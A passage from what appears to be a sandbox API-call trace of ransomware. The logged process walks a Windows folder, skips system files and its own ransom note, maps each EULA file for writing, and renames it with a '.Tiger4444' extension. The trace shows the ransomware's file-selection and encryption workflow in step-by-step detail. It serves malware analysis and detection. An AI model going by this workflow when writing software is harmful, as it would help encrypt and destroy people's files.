out: hHeap=0xc50000) returned 1 [0044.199] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0044.199] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0044.200] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0044.200] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0044.200] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0044.200] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13565290259) returned 1 [0044.200] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0044.200] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc719d8 | out: hHeap=0xc50000) returned 1 [0044.200] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.201] CloseHandle (hObject=0x2c8) returned 1 [0044.201] CloseHandle (hObject=0x260) returned 1 [0044.203] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ro-ro.htm.Tiger4444") returned 62 [0044.203] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ro-ro.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ro-ro.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ro-ro.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ro-ro.htm.tiger4444"), dwFlags=0x1) returned 1 [0044.204] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=78176 | out: Addend=0xc6f980) returned 13354272 [0044.204] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=5 | out: Addend=0xc6f98c) returned 4144 [0044.204] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5cfdc2, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5cfdc2, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x454cc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_ru-ru.htm", cAlternateFileName="EULA_R~2.HTM")) returned 1 [0044.204] lstrcmpiW (lpString1="EULA_ru-ru.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.204] lstrcmpiW (lpString1="EULA_ru-ru.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.204] lstrcmpiW (lpString1="EULA_ru-ru.htm", lpString2="Tiger4444.exe") returned -1 [0044.204] lstrcmpiW (lpString1="EULA_ru-ru.htm", lpString2=".") returned 1 [0044.205] lstrcmpiW (lpString1="EULA_ru-ru.htm", lpString2="..") returned 1 [0044.205] lstrcmpiW (lpString1="EULA_ru-ru.htm", lpString2="windows") returned -1 [0044.205] lstrcmpiW (lpString1="EULA_ru-ru.htm", lpString2="bootmgr") returned 1 [0044.205] lstrcmpiW (lpString1="EULA_ru-ru.htm", lpString2="pagefile.sys") returned -1 [0044.205] lstrcmpiW (lpString1="EULA_ru-ru.htm", lpString2="boot") returned 1 [0044.205] lstrcmpiW (lpString1="EULA_ru-ru.htm", lpString2="ids.txt") returned -1 [0044.205] lstrcmpiW (lpString1="EULA_ru-ru.htm", lpString2="NTUSER.DAT") returned -1 [0044.205] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_ru-ru.htm" | out: lpString1="EULA_ru-ru.htm") returned="EULA_ru-ru.htm" [0044.205] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ru-ru.htm", dwFileAttributes=0x0) returned 1 [0044.205] lstrlenW (lpString="EULA_ru-ru.htm") returned 14 [0044.205] lstrlenW (lpString="Tiger4444") returned 9 [0044.205] lstrcmpiW (lpString1="ru-ru.htm", lpString2="Tiger4444") returned -1 [0044.205] lstrlenW (lpString=".dll") returned 4 [0044.205] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0044.205] lstrlenW (lpString=".lnk") returned 4 [0044.205] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0044.205] lstrlenW (lpString=".ini") returned 4 [0044.205] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0044.205] lstrlenW (lpString=".sys") returned 4 [0044.205] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0044.205] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ru-ru.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ru-ru.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.205] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0044.205] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13565858495) returned 1 [0044.206] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=283852) returned 1 [0044.206] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0044.206] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71fb0 [0044.206] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x457d0, lpName=0x0) returned 0x2c8 [0044.207] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x457d0) returned 0xbe0000 [0044.215] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0044.215] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0044.215] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0044.215] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0044.215] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0044.215] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0044.215] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0044.215] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0044.215] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13566819643) returned 1 [0044.215] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0044.215] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71fb0 | out: hHeap=0xc50000) returned 1 [0044.215] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.217] CloseHandle (hObject=0x2c8) returned 1 [0044.218] CloseHandle (hObject=0x260) returned 1 [0044.224] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ru-ru.htm.Tiger4444") returned 62 [0044.224] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ru-ru.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ru-ru.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_ru-ru.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_ru-ru.htm.tiger4444"), dwFlags=0x1) returned 1 [0044.225] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=283856 | out: Addend=0xc6f980) returned 13432448 [0044.225] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=9 | out: Addend=0xc6f98c) returned 4149 [0044.225] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5cfdc2, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5cfdc2, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x14021, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_sk-sk.htm", cAlternateFileName="EULA_S~1.HTM")) returned 1 [0044.225] lstrcmpiW (lpString1="EULA_sk-sk.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.225] lstrcmpiW (lpString1="EULA_sk-sk.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.225] lstrcmpiW (lpString1="EULA_sk-sk.htm", lpString2="Tiger4444.exe") returned -1 [0044.225] lstrcmpiW (lpString1="EULA_sk-sk.htm", lpString2=".") returned 1 [0044.225] lstrcmpiW (lpString1="EULA_sk-sk.htm", lpString2="..") returned 1 [0044.225] lstrcmpiW (lpString1="EULA_sk-sk.htm", lpString2="windows") returned -1 [0044.225] lstrcmpiW (lpString1="EULA_sk-sk.htm", lpString2="bootmgr") returned 1 [0044.225] lstrcmpiW (lpString1="EULA_sk-sk.htm", lpString2="pagefile.sys") returned -1 [0044.225] lstrcmpiW (lpString1="EULA_sk-sk.htm", lpString2="boot") returned 1 [0044.225] lstrcmpiW (lpString1="EULA_sk-sk.htm", lpString2="ids.txt") returned -1 [0044.225] lstrcmpiW (lpString1="EULA_sk-sk.htm", lpString2="NTUSER.DAT") returned -1 [0044.225] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_sk-sk.htm" | out: lpString1="EULA_sk-sk.htm") returned="EULA_sk-sk.htm" [0044.225] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sk-sk.htm", dwFileAttributes=0x0) returned 1 [0044.225] lstrlenW (lpString="EULA_sk-sk.htm") returned 14 [0044.225] lstrlenW (lpString="Tiger4444") returned 9 [0044.225] lstrcmpiW (lpString1="sk-sk.htm", lpString2="Tiger4444") returned -1 [0044.225] lstrlenW (lpString=".dll") returned 4 [0044.225] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0044.225] lstrlenW (lpString=".lnk") returned 4 [0044.225] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0044.225] lstrlenW (lpString=".ini") returned 4 [0044.226] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0044.226] lstrlenW (lpString=".sys") returned 4 [0044.226] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0044.226] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sk-sk.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sk-sk.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.226] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0044.226] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13567885228) returned 1 [0044.226] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=81953) returned 1 [0044.226] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc896f8 [0044.226] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71378 [0044.226] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14330, lpName=0x0) returned 0x2c8 [0044.229] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14330) returned 0xbe0000 [0044.232] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0044.232] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0044.232] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0044.232] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0044.232] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0044.233] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0044.233] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0044.233] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0044.233] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13568580912) returned 1 [0044.233] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc896f8 | out: hHeap=0xc50000) returned 1 [0044.233] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71378 | out: hHeap=0xc50000) returned 1 [0044.233] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.234] CloseHandle (hObject=0x2c8) returned 1 [0044.234] CloseHandle (hObject=0x260) returned 1 [0044.236] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sk-sk.htm.Tiger4444") returned 62 [0044.236] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sk-sk.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sk-sk.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sk-sk.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sk-sk.htm.tiger4444"), dwFlags=0x1) returned 1 [0044.237] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=81968 | out: Addend=0xc6f980) returned 13716304 [0044.237] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=6 | out: Addend=0xc6f98c) returned 4158 [0044.237] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5cfdc2, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5cfdc2, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x1026f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_sl-si.htm", cAlternateFileName="EULA_S~2.HTM")) returned 1 [0044.237] lstrcmpiW (lpString1="EULA_sl-si.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.237] lstrcmpiW (lpString1="EULA_sl-si.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.237] lstrcmpiW (lpString1="EULA_sl-si.htm", lpString2="Tiger4444.exe") returned -1 [0044.237] lstrcmpiW (lpString1="EULA_sl-si.htm", lpString2=".") returned 1 [0044.237] lstrcmpiW (lpString1="EULA_sl-si.htm", lpString2="..") returned 1 [0044.237] lstrcmpiW (lpString1="EULA_sl-si.htm", lpString2="windows") returned -1 [0044.237] lstrcmpiW (lpString1="EULA_sl-si.htm", lpString2="bootmgr") returned 1 [0044.237] lstrcmpiW (lpString1="EULA_sl-si.htm", lpString2="pagefile.sys") returned -1 [0044.237] lstrcmpiW (lpString1="EULA_sl-si.htm", lpString2="boot") returned 1 [0044.237] lstrcmpiW (lpString1="EULA_sl-si.htm", lpString2="ids.txt") returned -1 [0044.237] lstrcmpiW (lpString1="EULA_sl-si.htm", lpString2="NTUSER.DAT") returned -1 [0044.237] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_sl-si.htm" | out: lpString1="EULA_sl-si.htm") returned="EULA_sl-si.htm" [0044.237] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sl-si.htm", dwFileAttributes=0x0) returned 1 [0044.238] lstrlenW (lpString="EULA_sl-si.htm") returned 14 [0044.238] lstrlenW (lpString="Tiger4444") returned 9 [0044.238] lstrcmpiW (lpString1="sl-si.htm", lpString2="Tiger4444") returned -1 [0044.238] lstrlenW (lpString=".dll") returned 4 [0044.238] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0044.238] lstrlenW (lpString=".lnk") returned 4 [0044.238] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0044.238] lstrlenW (lpString=".ini") returned 4 [0044.238] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0044.238] lstrlenW (lpString=".sys") returned 4 [0044.238] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0044.238] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sl-si.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sl-si.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.238] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0044.238] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13569131654) returned 1 [0044.238] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=66159) returned 1 [0044.238] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89950 [0044.238] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0044.238] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10570, lpName=0x0) returned 0x2c8 [0044.239] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10570) returned 0xbe0000 [0044.243] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0044.243] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0044.243] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0044.243] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0044.243] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0044.243] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0044.243] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0044.243] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0044.243] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13569625259) returned 1 [0044.243] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89950 | out: hHeap=0xc50000) returned 1 [0044.243] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0044.243] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.244] CloseHandle (hObject=0x2c8) returned 1 [0044.244] CloseHandle (hObject=0x260) returned 1 [0044.246] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sl-si.htm.Tiger4444") returned 62 [0044.246] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sl-si.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sl-si.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sl-si.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sl-si.htm.tiger4444"), dwFlags=0x1) returned 1 [0044.246] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=66160 | out: Addend=0xc6f980) returned 13798272 [0044.246] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=4 | out: Addend=0xc6f98c) returned 4164 [0044.247] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5e364e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5e364e, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x12720, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_sr-latn-cs.htm", cAlternateFileName="EULA_S~3.HTM")) returned 1 [0044.247] lstrcmpiW (lpString1="EULA_sr-latn-cs.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.247] lstrcmpiW (lpString1="EULA_sr-latn-cs.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.247] lstrcmpiW (lpString1="EULA_sr-latn-cs.htm", lpString2="Tiger4444.exe") returned -1 [0044.247] lstrcmpiW (lpString1="EULA_sr-latn-cs.htm", lpString2=".") returned 1 [0044.247] lstrcmpiW (lpString1="EULA_sr-latn-cs.htm", lpString2="..") returned 1 [0044.247] lstrcmpiW (lpString1="EULA_sr-latn-cs.htm", lpString2="windows") returned -1 [0044.247] lstrcmpiW (lpString1="EULA_sr-latn-cs.htm", lpString2="bootmgr") returned 1 [0044.247] lstrcmpiW (lpString1="EULA_sr-latn-cs.htm", lpString2="pagefile.sys") returned -1 [0044.247] lstrcmpiW (lpString1="EULA_sr-latn-cs.htm", lpString2="boot") returned 1 [0044.247] lstrcmpiW (lpString1="EULA_sr-latn-cs.htm", lpString2="ids.txt") returned -1 [0044.247] lstrcmpiW (lpString1="EULA_sr-latn-cs.htm", lpString2="NTUSER.DAT") returned -1 [0044.247] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="EULA_sr-latn-cs.htm" | out: lpString1="EULA_sr-latn-cs.htm") returned="EULA_sr-latn-cs.htm" [0044.247] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sr-latn-cs.htm", dwFileAttributes=0x0) returned 1 [0044.248] lstrlenW (lpString="EULA_sr-latn-cs.htm") returned 19 [0044.248] lstrlenW (lpString="Tiger4444") returned 9 [0044.248] lstrcmpiW (lpString1="tn-cs.htm", lpString2="Tiger4444") returned 1 [0044.248] lstrlenW (lpString=".dll") returned 4 [0044.248] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0044.248] lstrlenW (lpString=".lnk") returned 4 [0044.248] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0044.248] lstrlenW (lpString=".ini") returned 4 [0044.248] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0044.248] lstrlenW (lpString=".sys") returned 4 [0044.248] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0044.248] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sr-latn-cs.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sr-latn-cs.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0044.248] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0044.248] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13570127119) returned 1 [0044.248] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=75552) returned 1 [0044.248] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0044.248] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71730 [0044.248] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12a20, lpName=0x0) returned 0x2c8 [0044.249] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12a20) returned 0xbe0000 [0044.253] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0044.253] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0044.253] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0044.253] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0044.253] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0044.253] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0044.253] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0044.253] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0044.253] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13570662868) returned 1 [0044.254] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0044.254] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71730 | out: hHeap=0xc50000) returned 1 [0044.254] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0044.254] CloseHandle (hObject=0x2c8) returned 1 [0044.254] CloseHandle (hObject=0x260) returned 1 [0044.257] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sr-latn-cs.htm.Tiger4444") returned 67 [0044.257] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sr-latn-cs.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sr-latn-cs.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sr-latn-cs.htm.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sr-latn-cs.htm.tiger4444"), dwFlags=0x1) returned 1 [0044.257] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=75552 | out: Addend=0xc6f980) returned 13864432 [0044.257] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=5 | out: Addend=0xc6f98c) returned 4168 [0044.257] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5e364e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5e364e, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x112f7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_sv-se.htm", cAlternateFileName="EULA_S~4.HTM")) returned 1 [0044.257] lstrcmpiW (lpString1="EULA_sv-se.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0044.257] lstrcmpiW (lpString1="EULA_sv-se.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0044.257] lstrcmpiW 